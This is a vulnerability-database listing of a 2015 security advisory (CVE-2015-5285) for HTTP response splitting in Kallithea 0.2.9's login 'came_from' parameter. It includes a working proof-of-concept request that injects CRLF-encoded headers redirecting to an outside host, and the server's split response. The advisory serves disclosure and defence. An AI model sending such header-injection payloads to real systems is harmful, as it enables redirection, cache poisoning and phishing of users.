Kallithea 0.2.9 - 'came_from' HTTP Response Splitting

🗓️ 08 Oct 2015 00:00:00Reported by LiquidWormType

Kallithea 0.2.9 HTTP Response Splitting Vulnerabilit

Reporter	Title	Published	Views	Family All 16
0day.today	Kallithea 0.2.9 HTTP Response Splitting Vulnerability	8 Oct 201500:00	–	zdt
CNVD	Kallithea CRLF Injection Vulnerability	1 Nov 201500:00	–	cnvd
CVE	CVE-2015-5285	29 Oct 201520:00	–	cve
Cvelist	CVE-2015-5285	29 Oct 201520:00	–	cvelist
EUVD	EUVD-2015-0026	7 Oct 202500:30	–	euvd
exploitpack	Kallithea 0.2.9 - came_from HTTP Response Splitting	8 Oct 201500:00	–	exploitpack
Github Security Blog	Kallithea CRLF injection vulnerability	13 May 202201:26	–	github
NVD	CVE-2015-5285	29 Oct 201520:59	–	nvd
OpenVAS	Kallithea 'came_from' parameter HTTP Response Splitting Vulnerability	6 Nov 201500:00	–	openvas
OSV	GHSA-VFG9-PHJP-9FRW Kallithea CRLF injection vulnerability	13 May 202201:26	–	osv


Kallithea 0.2.9 (came_from) HTTP Response Splitting Vulnerability


Vendor: Kallithea
Product web page: https://www.kallithea-scm.org
Version affected: 0.2.9 and 0.2.2

Summary: Kallithea, a member project of Software Freedom Conservancy,
is a GPLv3'd, Free Software source code management system that supports
two leading version control systems, Mercurial and Git, and has a web
interface that is easy to use for users and admins.

Desc: Kallithea suffers from a HTTP header injection (response splitting)
vulnerability because it fails to properly sanitize user input before
using it as an HTTP header value via the GET 'came_from' parameter in
the login instance. This type of attack not only allows a malicious
user to control the remaining headers and body of the response the
application intends to send, but also allow them to create additional
responses entirely under their control.

Tested on: Kali
           Python


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2015-5267
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5267.php
Vendor: https://kallithea-scm.org/news/release-0.3.html
Vendor Advisory: https://kallithea-scm.org/security/cve-2015-5285.html
CVE ID: 2015-5285
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5285


21.09.2015

--


GET /_admin/login?came_from=d47b5%0d%0aX-Forwarded-Host%3a%20http://zeroscience.mk%01%02%0d%0aLocation%3a%20http://zeroscience.mk HTTP/1.1
Host: 192.168.0.28:8080
Content-Length: 0
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://192.168.0.28:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://192.168.0.28:8080/_admin/login?came_from=%2F
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: kallithea=3090b35b3e37ba350d71b62c240c50bf87932f0d7e6b1a600cba4e0e890b7e29e253b438

###

HTTP/1.1 302 Found
Cache-Control: no-cache
Content-Length: 411
Content-Type: text/html; charset=UTF-8
Date: Mon, 21 Sep 2015 13:58:05 GMT
Location: http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk
Pragma: no-cache
Server: waitress

<html>
 <head>
  <title>302 Found</title>
 </head>
 <body>
  <h1>302 Found</h1>
  The resource was found at <a href="http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk">http://192.168.0.28:8080/_admin/d47b5
X-Forwarded-Host: http://zeroscience.mk
Location: http://zeroscience.mk</a>;
you should be redirected automatically.


 </body>
</html>

08 Oct 2015 00:00Current

6.4Medium risk

Vulners AI Score6.4

CVSS 25

EPSS0.05309

Kallithea 0.2.9 - &#039;came_from&#039; HTTP Response Splitting

Kallithea 0.2.9 - 'came_from' HTTP Response Splitting